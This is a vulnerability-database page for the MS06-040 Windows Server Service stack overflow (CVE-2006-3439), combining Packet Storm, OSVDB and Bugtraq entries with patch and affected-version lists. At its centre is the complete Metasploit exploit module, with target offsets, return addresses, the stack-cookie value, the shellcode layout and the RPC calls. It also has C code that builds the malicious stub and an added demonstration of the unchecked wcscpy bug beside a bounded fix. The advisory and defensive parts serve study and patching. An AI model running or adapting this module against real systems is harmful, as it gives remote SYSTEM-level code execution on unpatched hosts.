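size_t build_canonicalize_stub(uint8_t *out, size_t cap,
                               const uint8_t *path, size_t path_units,
                               uint32_t referent, uint32_t outbuf_size,
                               uint32_t path_type, uint32_t flags)
{
    size_t need = 4 + 2 * ndr_ucvs_len(1) + ndr_ucvs_len(path_units) + 12;
    size_t n = 0;
    if (cap < need) return 0;
    n += ndr_long(out + n, referent);           /* arg_00 [unique] pointer */
    n += ndr_ucvs(out + n, EMPTY_WSTR, 1);      /* arg_00 server name: '' */
    n += ndr_ucvs(out + n, path, path_units);   /* arg_01 path: the overrun */
    n += ndr_long(out + n, outbuf_size);        /* arg_03 */
    n += ndr_ucvs(out + n, EMPTY_WSTR, 1);      /* arg_04 prefix: '' */
    n += ndr_long(out + n, path_type);          /* arg_05 */
    n += ndr_long(out + n, flags);              /* arg_06 */
    return n;
}

/* Detection side: actual_count of the path argument in a captured stub, the
 * field a length threshold applies to. Returns 0 for a truncated or
 * inconsistent stub rather than trusting its counts. */
uint32_t stub_path_units(const uint8_t *stub, size_t len)
{
    size_t pos = 4;                              /* skip the referent id */
    uint32_t srv_units, max_units, actual;
    if (len < pos + 12) return 0;
    srv_units = rd_long(stub + pos + 8);
    if (srv_units > len) return 0;
    pos += ndr_ucvs_len(srv_units);
    if (len < pos + 12) return 0;
    max_units = rd_long(stub + pos);
    actual = rd_long(stub + pos + 8);
    if (actual > max_units || actual > len || len < pos + 12 + (size_t)actual * 2)
        return 0;
    return actual;
}

/* Constructed sample: path "a\b" as UTF-16LE plus NUL, four units. */
size_t demo_build(uint8_t *out, size_t cap)
{
    static const uint8_t path[] = { 'a', 0, '\\', 0, 'b', 0, 0, 0 };
    return build_canonicalize_stub(out, cap, path, sizeof path / 2,
                                   0x00020000u, 0x40u, 1u, 0u);
}

size_t demo_stub_length(void)
{
    uint8_t buf[128];
    return demo_build(buf, sizeof buf);
}

uint32_t demo_parsed_path_units(void)
{
    uint8_t buf[128];
    size_t n = demo_build(buf, sizeof buf);
    return stub_path_units(buf, n);
}
```

The sample request is 68 bytes: 4 for the referent id, 16 for each empty string (12-byte header, one NUL unit, 2 bytes of padding), 20 for the four-unit path, and 12 for the three longs. A capture of the exploit's request differs only in the path block, where actual_count is several hundred units and the data is the payload, padding and return addresses shown in the module.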
		

- Vulnerability Information (F82940)

Microsoft Server Service NetpwPathCanonicalize Overflow (PacketStormID:F82940)
2009-11-26 00:00:00
H D Moore  metasploit.com
exploit,denial of service,overflow
windows,2k,nt,xp
CVE-2006-3439

This Metasploit module exploits a stack overflow in the NetApi32 CanonicalizePathName() function using the NetpwPathCanonicalize RPC call in the Server Service. It is likely that other RPC calls could be used to exploit this service. This exploit will result in a denial of service on Windows XP SP2 or Windows 2003 SP1. A failed exploit attempt will likely result in a complete reboot on Windows 2000 and the termination of all SMB-related services on Windows XP. The default target for this exploit should succeed on Windows NT 4.0, Windows 2000 SP0-SP4+, Windows XP SP0-SP1 and Windows 2003 SP0.
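The description above names the bug class: a path-canonicalization routine copies an attacker-controlled path into a fixed-size stack buffer without checking its length, so an over-long path overwrites the saved frame and return address (the "(wcscpy)" and "(stack)" target names in the module reflect that). The C below is an added, simplified model written for this page; it is not netapi32's code and not part of the Metasploit module. It shows the unbounded wcscpy/wcscat pattern next to a bounded version that refuses input which cannot fit, which is the check the unbounded one lacks. PATH_BUF_CHARS = 64, the component-collapsing rules ("." dropped, ".." pops the previous component, "\.." at the root stays at the root) and the sample paths are assumptions for illustration, not NetpwPathCanonicalize's actual semantics.

```c
#include <stddef.h>
#include <wchar.h>

/* Added example, not netapi32's code: a simplified canonicalizer showing the
 * bug class (unchecked wcscpy/wcscat of caller data into a fixed-size stack
 * buffer) beside a bounded version. PATH_BUF_CHARS is an assumed small bound
 * chosen to keep the example readable. */
#define PATH_BUF_CHARS 64

/* Collapse "", "." and ".." components of a backslash-separated path into
 * 'out' (outchars code units including NUL). Returns 0, or -1 if it does not fit. */
static int collapse_dots(const wchar_t *in, wchar_t *out, size_t outchars)
{
    size_t o = 0, root = 0;
    if (outchars == 0) return -1;
    if (*in == L'\\') {                       /* absolute: keep the leading separator */
        if (outchars < 2) return -1;
        out[o++] = L'\\';
        root = 1;
        in++;
    }
    while (*in) {
        const wchar_t *start = in;
        size_t len;
        while (*in && *in != L'\\') in++;
        len = (size_t)(in - start);
        if (*in == L'\\') in++;
        if (len == 0 || (len == 1 && start[0] == L'.'))
            continue;                                         /* "\\" or "." */
        if (len == 2 && start[0] == L'.' && start[1] == L'.') {
            if (o > root) {                                   /* pop last component */
                while (o > root && out[o - 1] != L'\\') o--;
                if (o > root) o--;
                continue;
            }
            if (root) continue;                               /* "\.." stays at root */
            /* relative path climbing above its base: keep ".." literally */
        }
        if (o > 0 && out[o - 1] != L'\\') {
            if (o + 1 >= outchars) return -1;
            out[o++] = L'\\';
        }
        if (o + len >= outchars) return -1;                   /* leave room for NUL */
        wmemcpy(out + o, start, len);
        o += len;
    }
    out[o] = L'\0';
    return 0;
}

/* Vulnerable pattern (illustration only; never called here). Nothing bounds
 * the copy, so a path longer than PATH_BUF_CHARS overwrites the saved frame:
 * that is the stack overflow the modules on this page exploit. */
int canonicalize_unchecked(const wchar_t *prefix, const wchar_t *path,
                           wchar_t *out, size_t outchars)
{
    wchar_t buf[PATH_BUF_CHARS];
    wcscpy(buf, prefix);
    wcscat(buf, path);
    return collapse_dots(buf, out, outchars);
}

/* Bounded version: refuse input that cannot fit, then copy with known lengths. */
int canonicalize_checked(const wchar_t *prefix, const wchar_t *path,
                         wchar_t *out, size_t outchars)
{
    wchar_t buf[PATH_BUF_CHARS];
    size_t plen = wcslen(prefix), len = wcslen(path);
    if (plen >= PATH_BUF_CHARS || len >= PATH_BUF_CHARS - plen)
        return -1;                                  /* would not fit with its NUL */
    wmemcpy(buf, prefix, plen);
    wmemcpy(buf + plen, path, len);
    buf[plen + len] = L'\0';
    return collapse_dots(buf, out, outchars);
}

/* Helper with constructed inputs: canonical form, or NULL when rejected. */
const wchar_t *demo_canonical(const wchar_t *prefix, const wchar_t *path)
{
    static wchar_t out[PATH_BUF_CHARS];
    return canonicalize_checked(prefix, path, out, PATH_BUF_CHARS) == 0 ? out : NULL;
}

/* A 199-unit path, larger than the buffer: must be rejected, never copied. */
int demo_overlong_path_rc(void)
{
    wchar_t longpath[200], out[PATH_BUF_CHARS];
    wmemset(longpath, L'A', 199);
    longpath[199] = L'\0';
    return canonicalize_checked(L"\\", longpath, out, PATH_BUF_CHARS);
}
```

The length check in canonicalize_checked runs before any byte is copied, so an over-long path costs the caller an error code instead of a smashed frame; in the unchecked variant the same input reaches wcscpy and the outcome depends entirely on what lies above buf on the stack.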

##
# $Id$
##

##
# This file is part of the Metasploit Framework and may be subject to 
# redistribution and commercial restrictions. Please see the Metasploit
# Framework web site for more information on licensing and terms of use.
# http://metasploit.com/framework/
##


require 'msf/core'


class Metasploit3 < Msf::Exploit::Remote

	include Msf::Exploit::Remote::DCERPC
	include Msf::Exploit::Remote::SMB


	def initialize(info = {})
		super(update_info(info,	
			'Name'           => 'Microsoft Server Service NetpwPathCanonicalize Overflow',
			'Description'    => %q{
				This module exploits a stack overflow in the NetApi32 CanonicalizePathName() function
				using the NetpwPathCanonicalize RPC call in the Server Service. It is likely that
				other RPC calls could be used to exploit this service. This exploit will result in
				a denial of service on Windows XP SP2 or Windows 2003 SP1. A failed exploit attempt
				will likely result in a complete reboot on Windows 2000 and the termination of all
				SMB-related services on Windows XP. The default target for this exploit should succeed
				on Windows NT 4.0, Windows 2000 SP0-SP4+, Windows XP SP0-SP1 and Windows 2003 SP0.
			},
			'Author'         => 
				[
					'hdm'
				],
			'License'        => MSF_LICENSE,
			'Version'        => '$Revision$',
			'References'     =>
				[
					[ 'CVE', '2006-3439' ],
					[ 'OSVDB', '27845' ],
					[ 'BID', '19409' ],
					[ 'MSB', 'MS06-040' ],
				],
			'DefaultOptions' =>
				{
					'EXITFUNC' => 'thread',
				},
			'Privileged'     => true,
			'Payload'        =>
				{
	  				# Technically we can use more space than this, but by limiting it
					# to 370 bytes we can use the same request for all Windows SPs.				
					'Space'    => 370,
					'BadChars' => "\x00\x0a\x0d\x5c\x5f\x2f\x2e",
					'StackAdjustment' => -3500,
				},
			'Platform'       => 'win',
			'DefaultTarget'  => 0,
			'Targets'        => 
				[
	  				[ '(wcscpy) Automatic (NT 4.0, 2000 SP0-SP4, XP SP0-SP1)', { } ],
					[ '(wcscpy) Windows NT 4.0 / Windows 2000 SP0-SP4', 
						{
							'Offset' => 1000,
							'Ret'    => 0x00020804 
						} 
					],
					[ '(wcscpy) Windows XP SP0/SP1',
						{
							'Offset' => 612, 
							'Ret'    => 0x00020804 
						}
					],
					[ '(stack)  Windows XP SP1 English',
						{
							'OffsetA' => 656,
							'OffsetB' => 680,
							'Ret'     => 0x71ab1d54 # jmp esp @ ws2_32.dll
						}
					],
					[ '(stack)  Windows XP SP1 Italian',
						{
							'OffsetA' => 656,
							'OffsetB' => 680,
							'Ret'     => 0x71a37bfb # jmp esp @ ws2_32.dll
						}
					],
					[ '(wcscpy) Windows 2003 SP0',
						{
							'Offset' => 612,
							'Ret'    => 0x00020804
						}
					],
				],

			'DisclosureDate' => 'Aug 8 2006'))

		register_options(
			[
				OptString.new('SMBPIPE', [ true,  "The pipe name to use (BROWSER, SRVSVC)", 'BROWSER']),
			], self.class)
						
	end

	def exploit

		connect()
		smb_login()

		# Work on a local copy of the target. Assigning to 'target' inside this
		# method would shadow the accessor for the rest of the method, leaving
		# it nil whenever a non-automatic target was selected.
		mytarget = target
		if (target.name =~ /Automatic/)
			case smb_peer_os()
				when 'Windows 5.0'
					print_status("Detected a Windows 2000 target")
					mytarget = targets[1]

				when 'Windows NT 4.0'
					print_status("Detected a Windows NT 4.0 target")
					mytarget = targets[1]

				when 'Windows 5.1'
					begin
						smb_create("\\SRVSVC")
						print_status("Detected a Windows XP SP0/SP1 target")
					rescue ::Rex::Proto::SMB::Exceptions::ErrorCode => e
						if (e.error_code == 0xc0000022)
							print_status("Windows XP SP2 is not exploitable")
							return
						end
						print_status("Detected a Windows XP target (unknown patch level)")
					end
					mytarget = targets[2]

				when /Windows Server 2003 (\d+)$/
					print_status("Detected a Windows 2003 SP0 target")
					mytarget = targets[5]

				when /Windows Server 2003 (\d+) Service Pack (\d+)/
					print_status("Windows 2003 SP#{$2} is not exploitable")
					return

				when /Samba/
					print_status("Samba is not vulnerable")
					return

				else
					print_status("No target detected for #{smb_peer_os()}/#{smb_peer_lm()}...")
					return
			end
		end

		# Specific fixups for Windows NT
		case smb_peer_os()
		when 'Windows NT 4.0'
			print_status("Adjusting the SMB/DCERPC parameters for Windows NT")
			datastore['SMB::pipe_write_min_size'] = 2048
			datastore['SMB::pipe_write_max_size'] = 4096
		end

		handle = dcerpc_handle(
			'4b324fc8-1670-01d3-1278-5a47bf6ee188', '3.0',
			'ncacn_np', ["\\#{datastore['SMBPIPE']}"]
		)

		print_status("Binding to #{handle} ...")
		dcerpc_bind(handle)
		print_status("Bound to #{handle} ...")

		#
		#  /* Function 0x1f at 0x767e912c */
		#  long function_1f (
		#    [in] [unique] [string] wchar_t * arg_00,
		#    [in] [string] wchar_t * arg_01,
		#    [out] [size_is(arg_03)] char * arg_02,
		#    [in] [range(0, 64000)] long arg_03,
		#    [in] [string] wchar_t * arg_04,
		#    [in,out] long * arg_05,
		#    [in] long arg_06
		#  );
		#

		print_status("Building the stub data...")
		stub = ''

		case mytarget.name

		# This covers NT 4.0 as well
		when /wcscpy.*Windows 2000/

			code = make_nops(mytarget['Offset'] - payload.encoded.length) + payload.encoded

			path = code + ( [mytarget.ret].pack('V') * 16 ) + "\x00\x00"

			stub =
				NDR.long(rand(0xffffffff)) +
				NDR.UnicodeConformantVaryingString('') +
				NDR.UnicodeConformantVaryingStringPreBuilt(path) +
				NDR.long(rand(250)+1) +
				NDR.UnicodeConformantVaryingStringPreBuilt("\xeb\x02\x00\x00") +
				NDR.long(rand(250)+1) +
				NDR.long(0)

		when /wcscpy.*Windows XP/
			path =
				# Payload goes first
				payload.encoded +

				# Padding
				rand_text_alphanumeric(mytarget['Offset'] - payload.encoded.length) +

				# Land 6 bytes in to bypass garbage (XP SP0)
				[ mytarget.ret + 6 ].pack('V') +

				# Padding
				rand_text_alphanumeric(8) +

				# Address to write our shellcode (XP SP0)
				[ mytarget.ret ].pack('V') +

				# Padding
				rand_text_alphanumeric(32) +

				# Jump straight to shellcode (XP SP1)
				[ mytarget.ret ].pack('V') +

				# Padding
				rand_text_alphanumeric(8) +

				# Address to write our shellcode (XP SP1)
				[ mytarget.ret ].pack('V') +

				# Padding
				rand_text_alphanumeric(32) +

				# Terminate the path
				"\x00\x00"

			stub =
				NDR.long(rand(0xffffffff)) +
				NDR.UnicodeConformantVaryingString('') +
				NDR.UnicodeConformantVaryingStringPreBuilt(path) +
				NDR.long(rand(0xf0)+1) +
				NDR.UnicodeConformantVaryingString('') +
				NDR.long(rand(0xf0)+1) +
				NDR.long(0)


		when /stack/
			buff = rand_text_alphanumeric(800)
			buff[0, payload.encoded.length] = payload.encoded
			buff[ mytarget['OffsetA'], 4 ] = [mytarget.ret].pack('V')
			buff[ mytarget['OffsetB'], 5 ] = "\xe9" + [ (mytarget['OffsetA'] + 5) * -1 ].pack('V')

			path = "\\\x00\\\x00" + buff + "\x00\x00"

			stub =
				NDR.long(rand(0xffffffff)) +
				NDR.UnicodeConformantVaryingString('') +
				NDR.UnicodeConformantVaryingStringPreBuilt(path) +
				NDR.long(rand(0xf0)+1) +
				NDR.UnicodeConformantVaryingString('') +
				NDR.long(rand(0xf0)+1) +
				NDR.long(0)


		when /wcscpy.*Windows 2003/
			path =
				# Payload goes first
				payload.encoded +

				# Padding
				rand_text_alphanumeric(mytarget['Offset'] - payload.encoded.length) +

				# Padding
				rand_text_alphanumeric(32) +

				# The cookie is constant,
				# noticed by Nicolas Pouvesle in Misc #28
				"\x4e\xe6\x40\xbb" +

				# Padding
				rand_text_alphanumeric(4) +

				# Jump straight to shellcode
				[ mytarget.ret ].pack('V') +

				# Padding
				rand_text_alphanumeric(8) +

				# Address to write our shellcode
				[ mytarget.ret ].pack('V') +

				# Padding
				rand_text_alphanumeric(40) +

				# Terminate the path
				"\x00\x00"

			stub =
				NDR.long(rand(0xffffffff)) +
				NDR.UnicodeConformantVaryingString('') +
				NDR.UnicodeConformantVaryingStringPreBuilt(path) +
				NDR.long(rand(0xf0)+1) +
				NDR.UnicodeConformantVaryingString('') +
				NDR.long(rand(0xf0)+1) +
				NDR.long(0)

		end

		print_status("Calling the vulnerable function...")

		begin
			dcerpc.call(0x1f, stub)
			dcerpc.call(0x1f, stub)
		rescue Rex::Proto::DCERPC::Exceptions::NoResponse
		rescue => e
			if e.to_s !~ /STATUS_PIPE_DISCONNECTED/
				raise e
			end
		end

		# Cleanup
		handler
		disconnect
	end

end
    

- Vulnerability Information

OSVDB ID: 27845
Microsoft Windows Server Service Crafted RPC Message Remote Overflow
Location: Remote / Network Access
Attack Type: Input Manipulation
Impact: Loss of Integrity
Solution: Patch / RCS
Exploit: Exploit Public, Exploit Commercial
Disclosure: Vendor Verified

- Description

A buffer overflow exists in Windows. The Server service fails to validate RPC messages resulting in a buffer overflow. With a specially crafted RPC message, a remote attacker can cause arbitrary code execution resulting in a loss of integrity.

- Timeline

2006-08-08 Unknown
2006-08-19 2006-08-08

- Solution

Currently, there are no known workarounds or upgrades to correct this issue. However, Microsoft has released a patch to address this vulnerability.

- References

- Credit

Unknown or Incomplete

- Vulnerability Information

Microsoft Windows Server Service Remote Buffer Overflow Vulnerability
Bugtraq ID: 19409
Class: Boundary Condition Error
Remote: Yes  Local: No
Published: 2006-08-08 12:00:00  Updated: 2007-06-27 02:58:00
US-CERT and SANS are credited with providing information about this issue. The individual responsible for discovering this issue is currently unknown.

- Affected Versions

Microsoft Windows XP Tablet PC Edition SP2
Microsoft Windows XP Tablet PC Edition SP1
Microsoft Windows XP Tablet PC Edition
Microsoft Windows XP Professional x64 Edition
Microsoft Windows XP Professional SP2
Microsoft Windows XP Professional SP1
Microsoft Windows XP Professional
Microsoft Windows XP Media Center Edition SP2
Microsoft Windows XP Media Center Edition SP1
Microsoft Windows XP Media Center Edition
Microsoft Windows XP Home SP2
Microsoft Windows XP Home SP1
Microsoft Windows XP Home
Microsoft Windows Server 2003 Web Edition SP1
Microsoft Windows Server 2003 Web Edition
Microsoft Windows Server 2003 Standard x64 Edition
Microsoft Windows Server 2003 Standard Edition SP1
Microsoft Windows Server 2003 Standard Edition
Microsoft Windows Server 2003 Enterprise x64 Edition
Microsoft Windows Server 2003 Enterprise Edition Itanium SP1
Microsoft Windows Server 2003 Enterprise Edition Itanium 0
Microsoft Windows Server 2003 Enterprise Edition SP1
Microsoft Windows Server 2003 Enterprise Edition
Microsoft Windows Server 2003 Datacenter x64 Edition
Microsoft Windows Server 2003 Datacenter Edition Itanium SP1
Microsoft Windows Server 2003 Datacenter Edition Itanium 0
Microsoft Windows Server 2003 Datacenter Edition SP1
Microsoft Windows Server 2003 Datacenter Edition
Microsoft Windows NT Workstation 4.0 SP6a
Microsoft Windows NT Workstation 4.0 SP6
Microsoft Windows NT Workstation 4.0 SP5
Microsoft Windows NT Workstation 4.0 SP4
Microsoft Windows NT Workstation 4.0 SP3
Microsoft Windows NT Workstation 4.0 SP2
Microsoft Windows NT Workstation 4.0 SP1
Microsoft Windows NT Workstation 4.0
Microsoft Windows NT Terminal Server 4.0 SP6a
Microsoft Windows NT Terminal Server 4.0 SP6
Microsoft Windows NT Terminal Server 4.0 SP5
Microsoft Windows NT Terminal Server 4.0 SP4
Microsoft Windows NT Terminal Server 4.0 SP3
Microsoft Windows NT Terminal Server 4.0 SP2
Microsoft Windows NT Terminal Server 4.0 SP1
Microsoft Windows NT Terminal Server 4.0
Microsoft Windows NT Server 4.0 SP6a
+ Avaya DefinityOne Media Servers
+ Avaya IP600 Media Servers
+ Avaya S3400 Message Application Server 0
+ Avaya S8100 Media Servers 0
Microsoft Windows NT Server 4.0 SP6
Microsoft Windows NT Server 4.0 SP5
Microsoft Windows NT Server 4.0 SP4
Microsoft Windows NT Server 4.0 SP3
Microsoft Windows NT Server 4.0 SP2
Microsoft Windows NT Server 4.0 SP1
Microsoft Windows NT Server 4.0
Microsoft Windows NT Enterprise Server 4.0 SP6a
Microsoft Windows NT Enterprise Server 4.0 SP6
Microsoft Windows NT Enterprise Server 4.0 SP5
Microsoft Windows NT Enterprise Server 4.0 SP4
Microsoft Windows NT Enterprise Server 4.0 SP3
Microsoft Windows NT Enterprise Server 4.0 SP2
Microsoft Windows NT Enterprise Server 4.0 SP1
Microsoft Windows NT Enterprise Server 4.0
Microsoft Windows NT 4.0 SP6a
+ Microsoft Windows NT Enterprise Server 4.0 SP6a
+ Microsoft Windows NT Server 4.0 SP6a
+ Microsoft Windows NT Terminal Server 4.0 SP6a
+ Microsoft Windows NT Workstation 4.0 SP6a
Microsoft Windows NT 4.0 SP6
+ Microsoft Windows NT Enterprise Server 4.0 SP6
+ Microsoft Windows NT Server 4.0 SP6
+ Microsoft Windows NT Terminal Server 4.0 SP6
+ Microsoft Windows NT Workstation 4.0 SP6
Microsoft Windows NT 4.0 SP5
+ Microsoft Windows NT Enterprise Server 4.0 SP5
+ Microsoft Windows NT Server 4.0 SP5
+ Microsoft Windows NT Terminal Server 4.0 SP5
+ Microsoft Windows NT Workstation 4.0 SP5
Microsoft Windows NT 4.0 SP4
+ Microsoft Windows NT Enterprise Server 4.0 SP4
+ Microsoft Windows NT Server 4.0 SP4
+ Microsoft Windows NT Terminal Server 4.0 SP4
+ Microsoft Windows NT Workstation 4.0 SP4
Microsoft Windows NT 4.0 SP3
+ Microsoft Windows NT Enterprise Server 4.0 SP3
+ Microsoft Windows NT Server 4.0 SP3
+ Microsoft Windows NT Terminal Server 4.0 SP3
+ Microsoft Windows NT Workstation 4.0 SP3
Microsoft Windows NT 4.0 SP2
+ Microsoft Windows NT Enterprise Server 4.0 SP2
+ Microsoft Windows NT Server 4.0 SP2
+ Microsoft Windows NT Terminal Server 4.0 SP2
+ Microsoft Windows NT Workstation 4.0 SP2
Microsoft Windows NT 4.0 SP1
+ Microsoft Windows NT Enterprise Server 4.0 SP1
+ Microsoft Windows NT Server 4.0 SP1
+ Microsoft Windows NT Terminal Server 4.0 SP1
+ Microsoft Windows NT Workstation 4.0 SP1
Microsoft Windows NT 4.0
+ Microsoft Windows NT Enterprise Server 4.0
+ Microsoft Windows NT Server 4.0
+ Microsoft Windows NT Terminal Server 4.0
+ Microsoft Windows NT Workstation 4.0
Microsoft Windows 2000 Server SP4
Microsoft Windows 2000 Server SP3
Microsoft Windows 2000 Server SP2
Microsoft Windows 2000 Server SP1
Microsoft Windows 2000 Server
+ Avaya DefinityOne Media Servers
+ Avaya IP600 Media Servers
+ Avaya S3400 Message Application Server 0
+ Avaya S8100 Media Servers 0
Microsoft Windows 2000 Professional SP4
Microsoft Windows 2000 Professional SP3
Microsoft Windows 2000 Professional SP2
Microsoft Windows 2000 Professional SP1
Microsoft Windows 2000 Professional
Microsoft Windows 2000 Datacenter Server SP4
Microsoft Windows 2000 Datacenter Server SP3
Microsoft Windows 2000 Datacenter Server SP2
Microsoft Windows 2000 Datacenter Server SP1
Microsoft Windows 2000 Datacenter Server
Microsoft Windows 2000 Advanced Server SP4
Microsoft Windows 2000 Advanced Server SP3
Microsoft Windows 2000 Advanced Server SP2
Microsoft Windows 2000 Advanced Server SP1
Microsoft Windows 2000 Advanced Server

- Discussion

Microsoft Windows Server Service is prone to a remote buffer-overflow vulnerability.

This vulnerability arises when the service processes a malicious message in RPC communications.

A successful attack may result in arbitrary code execution with SYSTEM privileges leading to a full compromise. Attack attempts may result in denial-of-service conditions as well.

Microsoft has reported that this issue is being exploited in the wild.

Update (August 14, 2006): A worm named 'W32.Wargbot' that exploits this issue to spread is currently in the wild.

- Exploit

Proof-of-concept exploits are available to members of the Immunity Partners program:

https://www.immunityinc.com/downloads/immpartners/ms06_040.tgz
https://www.immunityinc.com/downloads/immpartners/ms06_040.tar.gz

Another exploit for Immunity Partners is available:

https://www.immunityinc.com/downloads/immpartners/ms06_040-1.tar

This exploit reportedly works reliably against Windows 2003 with no service packs.

A Metasploit exploit module is available. It reportedly works against Windows NT 4.0, Windows 2000, Windows 2000 SP1 - SP4, Windows XP, and Windows XP SP1. It may result in a denial-of-service condition for Windows XP SP2 and Windows 2003 SP1.

A version of the Metasploit module has been ported to C and is available.

An additional exploit by ub3r st4r is available.

- Solution

Microsoft has released an advisory including fixes to address this issue.

A Cisco advisory containing various mitigation strategies using Cisco products to prevent attacks is available. Please see the references for more information.


Fixes are available for:

Microsoft Windows Server 2003 Datacenter Edition SP1
Microsoft Windows XP Media Center Edition SP2
Microsoft Windows Server 2003 Enterprise Edition Itanium SP1
Microsoft Windows XP Tablet PC Edition SP1
Microsoft Windows XP Tablet PC Edition SP2
Microsoft Windows XP Media Center Edition SP1
Microsoft Windows Server 2003 Enterprise Edition Itanium 0
Microsoft Windows Server 2003 Standard Edition SP1
Microsoft Windows Server 2003 Standard Edition
Microsoft Windows Server 2003 Enterprise x64 Edition
Microsoft Windows Server 2003 Datacenter Edition Itanium 0
Microsoft Windows Server 2003 Datacenter x64 Edition
Microsoft Windows Server 2003 Enterprise Edition SP1
Microsoft Windows Server 2003 Datacenter Edition
Microsoft Windows 2000 Advanced Server SP4
Microsoft Windows Server 2003 Enterprise Edition
Microsoft Windows XP Home SP2
Microsoft Windows 2000 Datacenter Server SP4
Microsoft Windows Server 2003 Web Edition
Microsoft Windows XP Home SP1
Microsoft Windows XP Professional x64 Edition
Microsoft Windows Server 2003 Web Edition SP1
Microsoft Windows Server 2003 Datacenter Edition Itanium SP1
Microsoft Windows XP Professional SP2
Microsoft Windows Server 2003 Standard x64 Edition
Microsoft Windows 2000 Server SP4
Microsoft Windows 2000 Professional SP4
Microsoft Windows XP Professional SP1

- References

About the SCAP Chinese Community

The SCAP Chinese Community (SCAP中文社区) is the first Chinese open community devoted to SCAP. For more information, see the site's About page.

Copyright notice

CVE, CWE and OVAL are registered trademarks of MITRE; their official data sources are kept on MITRE's websites.